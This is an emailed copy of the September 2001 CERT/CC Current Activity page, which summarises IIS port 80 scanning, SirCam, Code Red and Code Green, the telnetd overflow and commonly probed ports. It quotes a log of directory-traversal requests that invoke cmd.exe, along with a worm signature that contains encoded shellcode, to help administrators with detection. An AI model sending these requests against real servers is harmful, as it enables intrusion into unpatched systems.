CERT/CC Current Activity
-----Original Message-----
From: Jeffrey Letourneau [mailto:[log in to unmask]]
Sent: Tuesday, September 18, 2001 12:50 PM
To: [log in to unmask]; [log in to unmask]
Subject: CERT-CC Current Activity.htm
--------------------------------------------------------------------------------
Options
Advisories
Vulnerability Notes Database
Incident Notes
Current Activity
Related
Summaries
Tech Tips
AirCERT
Employment Opportunities
more links
CERT Statistics
Vulnerability Disclosure Policy
CERT Knowledgebase
System Administrator courses
CSIRT courses
Other Sources of Security Information
Channels
Message
Welcome to the new Incidents, Quick Fixes, and Vulnerabilities area of the CERT/CC web site.
Related Sites
CERT/CC Current Activity
The CERT/CC Current Activity web page is a regularly updated summary of the most frequent, high-impact types of security incidents and vulnerabilities currently being reported to the CERT/CC.
Last Reviewed: Tue Sep 18 10:20:45 EDT 2001
Date Added Last Updated
a.. Increase in Port 80 (HTTP) scanning activity
18 September 2001 18 September 2001
a.. Computer virus alert hoax
13 September 2001 13 September 2001
a.. W32/SirCam Malicious Code
23 July 2001 17 August 2001
a.. Cache Corruption on Microsoft DNS Servers
31 August 2001 31 August 2001
a.. "Code Red" Related Activity
2 August 2001 7 September 2001
a.. Exploitation of a buffer overflow in telnetd
30 July 2001 17 August 2001
a.. Scans and Probes
- 17 August 2001
--------------------------------------------------------------------------
Increase in Port 80 (HTTP) scanning activity
This morning (September 18th) the CERT/CC started receiving reports of a massive increase in scanning directed at port 80 (HTTP). Reports indicate that this scanning activity is attempting to exploit systems previously compromised by Code Red II and/or the sadmind/IIS worm as well as other known vulnerabilities in Microsoft Internet Information Server (IIS). Please see CERT Vulnerability Note VU#111677 for information on the type of vulnerability being exploited.
The following is a log excerpt of this scanning activity:
GET /scripts/root.exe?/c+dir
GET /MSADC/root.exe?/c+dir
GET /c/winnt/system32/cmd.exe?/c+dir
GET /d/winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /_vti_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /_mem_bin/..%5c../..%5c../..%5c../winnt/system32/cmd.exe?/c+dir
GET /msadc/..%5c../..%5c../..%5c/..\xc1\x1c../..\xc1\x1c../..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x1c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0/../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc0\xaf../winnt/system32/cmd.exe?/c+dir
GET /scripts/..\xc1\x9c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%35c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%5c../winnt/system32/cmd.exe?/c+dir
GET /scripts/..%2f../winnt/system32/cmd.exe?/c+dir
The CERT/CC has also received reports of a possibly new piece of malicious code named "readme.exe" being sent via email. Preliminary analysis indicates that this file may be related to the increase in port 80 scanning activity.
Sites are encouraged to verify the state of security patches on all IIS servers and email client software. Administrators may also want to add filters to mail servers to block the "readme.exe" attachment. In addition, sites may wish to notify users of the existence of "readme.exe" and its potential threat.
--------------------------------------------------------------------------
Computer virus alert hoax
The CERT/CC has received several reports of an email in circulation on the Internet claiming that we have made an announcement regarding a new wave of computer viruses following the attacks in New York and Washington. We have no evidence to support this statement and no such announcement has been made by the CERT/CC. At this time we have not seen any significant increase in security incidents.
Regardless of any specific threat, we continue to encourage users to exercise safe email practices including caution when handling email attachments.
The CERT/CC takes great care to make sure that the information we publish is accurate and verifiable. Similarly, we encourage all users to verify any statements that may be attributed to us. All announcements to the CERT Advisory mailing list are cryptographically signed for verification purposes. Any CERT announcements would also be published on our web site (most often on our Current Activity page).
--------------------------------------------------------------------------
W32/SirCam Virus
The CERT/CC continues to receive a large number of reports of a piece of malicious code known as W32/SirCam. W32/SirCam arrives in email with the following characteristics:
Subject: (same as the name of the attached file)
Body of English version:
(first line) Hi! How are you?
(last line) See you later. Thanks
Body of Spanish version:
(first line) Hola como estas?
(last line) Nos vemos pronto, gracias.
Attachment: A random filename with a double extension (like example.doc.bat)
Detailed information about W32/SirCam can be found in CERT Advisory CA-2001-22 or by visiting the sites listed on our Computer Virus Resources page. Users are strongly encouraged to visit their anti-virus vendor's website for information on how to properly remove W32/SirCam from an infected computer.
--------------------------------------------------------------------------
Cache Corruption on Microsoft DNS Servers
The CERT/CC has received reports from sites experiencing DNS cache corruption on systems running Microsoft DNS Server. The default configuration of this software allows for data from malicious or incorrectly configured DNS servers to be cached and supplied to client computers using that cache to resolve DNS information.
Please see:
a.. CERT Incident Note IN-2001-11
--------------------------------------------------------------------------
"Code Red" Related Activity
a.. "Code Green" Worm
The CERT/CC has started receiving reports of a new worm known as "Code Green". The "Code Green" worm is designed to patch systems vulnerable to the "Code Red" worms and attempt to remove backdoors left by "Code Red II".
"Code Green" will leave the following signature in web server logs (the presence of this log entry does not necessarily indicate an infection):
"GET /default.ida?Code_Green_<I_like_the_colour
-_-><AntiCodeRed-CodeRedIII-IDQ_Patcher>_V1.0_b
eta_written_by_'Der_HexXer'-Wuerzburg_Germany-_
is_dedicated_to_my_sisterli_'Doro'.Save_Whale_a
nd_visit_<www.buhaboard.de>_and_<www.buha-secur
ity.de>%u9090%u6858%ucbd3%u7801%u9090%u6858%ucb
d3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8
190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u
00=a HTTP/1.0"
b.. "Code Red II" Worm
The CERT/CC continues to receive reports of a worm commonly referred to as "Code Red II". The widespread, automated attack and propagation characteristics of "Code Red II" have caused bandwidth denial-of-service conditions in isolated portions of the Internet, particularly near groups of compromised hosts where "Code Red II" is running. Detailed information about the "Code Red II" worm can be found in:
a.. CERT Incident Note IN-2001-09
c.. "Code Red" Worm
We also continue to receive reports of the original "Code Red" worm. Machines infected by this worm started scanning the Internet for vulnerable servers again on September 1st 2001.
Please see these documents for more information:
a.. A Very Real and Present Threat to the Internet: Resurgence in Code Red Scanning Activity
b.. CERT Advisory CA-2001-13
c.. CERT Advisory CA-2001-19
d.. CERT Advisory CA-2001-23
d.. "Code Red" Worm Crashes IIS 4.0 Servers with URL Redirection Enabled
Along with the large number of "Code Red" and "Code Red II" reports indicating that systems are compromised, the CERT/CC has received a smaller yet still significant number of reports where Windows NT 4.0 IIS 4.0 systems have been adversely affected by the high volume of "Code Red" scanning activity. A recently discovered vulnerability can cause an IIS 4.0 server (patched against "Code Red" according to Microsoft Security Bulletin MS01-033) with URL redirection enabled to crash when scanned by the "Code Red" worms.
Please see:
a.. "Code Red" Worm Crashes IIS 4.0 Servers with URL Redirection Enabled
The CERT/CC is interested in receiving reports of "Code Red" activity. If machines under your administrative control are compromised, please send mail to [log in to unmask]
--------------------------------------------------------------------------
Exploitation of a buffer overflow in telnetd
The CERT/CC has received reports of exploitation of the buffer overflow in the telnetd program discussed in CERT Advisory CA-2001-21. This vulnerability can crash the telnetd server, or be leveraged to gain root access to the host. Sites are encouraged to read the advisory and take appropriate steps to protect any machines running the telnetd service.
The CERT/CC is interested in receiving reports of this activity. If machines under your administrative control are compromised, please send mail to [log in to unmask]
--------------------------------------------------------------------------
Scans and Probes
We receive many daily reports of scanning and probing activity. The most frequent reports tend to involve services that have well-known vulnerabilities. Internet hosts continue to be affected by exploitation of well-known vulnerabilities in many of these services.
Service Name Port/Protocol Related Information
ftp 21/tcp IN-2001-01, Widespread Compromises via "ramen" Toolkit
IN-2000-10, Widespread Exploitation of rcp.statd and wu-ftpd Vulnerabilities
CA-2000-13, Two Input Validation Problems In FTPD
AA-2000.02, wu-ftpd "site exec" Vulnerability
CA-1999-13, Multiple Vulnerabilities in WU-FTPD
CA-1997-27, FTP Bounce
ssh 22/tcp CA-1999-15, Buffer Overflows in SSH Daemon and RSAREF2 Library
telnet 23/tcp IN-2000-09, Systems Compromised Through a Vulnerability in the IRIX telnet daemon
CA-2001-21, Buffer Overflow in telnetd
domain 53/tcp
53/udp CA-2001-02, Multiple Vulnerabilities in BIND
CA-2000-20, Multiple Denial-of-Service Problems in ISC BIND
IN-2000-04, Denial of Service Attacks using Nameservers
CA-2000-03, Continuing Compromises of Nameservers
CA-1999-14, Multiple Vulnerabilities in BIND
CA-1998-05, Multiple Vulnerabilities in BIND
http 80/tcp CA-2001-11, sadmind/IIS Worm
CA-2001-23, Continued Threat of the "Code Red" Worm
"linuxconf" on some Linux distributions 98/tcp Some Linux distributions ship with linuxconf, a program which listens on TCP port 98. While we do not have any reports of intruders actively exploiting vulnerabilites in linuxconf, these probes may be used to identify linux machines that have other vulnerabilities.
pop2 109/tcp ipop2d buffer overflow
pop3 110/tcp Qpopper buffer overflow
CA-1997-09, Vulnerability in IMAP and POP
sunrpc 111/tcp
111/udp CA-2001-05, Exploitation of snmpXdmid
IN-2001-01, Widespread Compromises via "ramen" Toolkit
IN-2000-10, Widespread Exploitation of rcp.statd and wu-ftpd Vulnerabilities
CA-2000-17, Input Validation Problem in rpc.statd
CA-1999-16, Buffer Overflow in Sun Solstice AdminSuite Daemon sadmind
CA-1999-12, Buffer overflow in amd
CA-1999-08, Buffer overflow in rpc.cmsd
CA-1999-05, Vulnerability in statd exposes vulnerability in automountd
CA-1998-12, Remotely Exploitable Buffer Overflow Vulnerability in mountd
CA-1998-11, Vulnerability in ToolTalk RPC service
CA-2001-11, sadmind/IIS Worm
netbios-ns
netbios-dgm
netbios-ssn 137/udp
138/udp
139/tcp IN-2000-03, 911 Worm
IN-2000-02, Exploitation of Unprotected Windows Networking Shares
CA-2001-23, Continued Threat of the "Code Red" Worm
imap 143/tcp CA-1998-09, Buffer Overflow in Some Implementations of IMAP Servers
CA-1997-09, Vulnerability in IMAP and POP
printer
515/tcp
IN-2001-01, Widespread Compromises via "ramen" Toolkit
Vulnerability Note VU#382365, LPRng can pass user-supplied input as a format string parameter to syslog() calls
klogind
543/tcp
CA-2000-06, Multiple Buffer Overflows in Kerberos Authenticated Services
socks 1080/tcp VN-1998-03, WinGate IP Laundering
SGI objectserver 5135/tcp 20000303-01-PX, Vulnerability in IRIX 5.3 and 6.2 objectserver
SubSeven 27374/tcp IN-2001-07, W32/Leaves: Exploitation of previously installed SubSeven Trojan Horses
ICMP echo
ICMP echo reply ICMP type 8
ICMP type 0 CA-1998-01, "smurf" IP Denial-of-Service Attacks
--------------------------------------------------------------------------
For an overview of incident and vulnerability activity during the last quarter, see the most recent CERT Summary.
--------------------------------------------------------------------------
Copyright 1999, 2000, 2001 Carnegie Mellon University.
See the conditions for use, disclaimers, and copyright information.
CERT® and CERT Coordination Center® are registered in the U.S. Patent and Trademark office.
|